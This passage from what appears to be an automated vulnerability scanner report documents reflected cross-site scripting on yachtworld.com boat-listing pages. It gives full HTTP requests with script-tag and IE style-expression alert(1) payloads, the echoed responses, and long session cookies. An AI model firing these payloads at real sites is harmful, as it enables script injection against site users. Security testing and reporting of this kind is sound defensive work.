DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:17:13 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 21:17:12 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
re/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Ricof752b"><script>alert(1)</script>40b5af5053c&boat_id=2152119">
...[SNIP]...

3.103. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472fc"style%3d"x%3aexpression(alert(1))"b802179cd3d was submitted in the REST URL parameter 5. This input was echoed as 472fc"style="x:expression(alert(1))"b802179cd3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico472fc"style%3d"x%3aexpression(alert(1))"b802179cd3d HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:08 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:08 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
re/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico472fc"style="x:expression(alert(1))"b802179cd3d&boat_id=2152119">
...[SNIP]...

3.104. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 144cb"><script>alert(1)</script>523d00231bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico?144cb"><script>alert(1)</script>523d00231bb=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:51 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
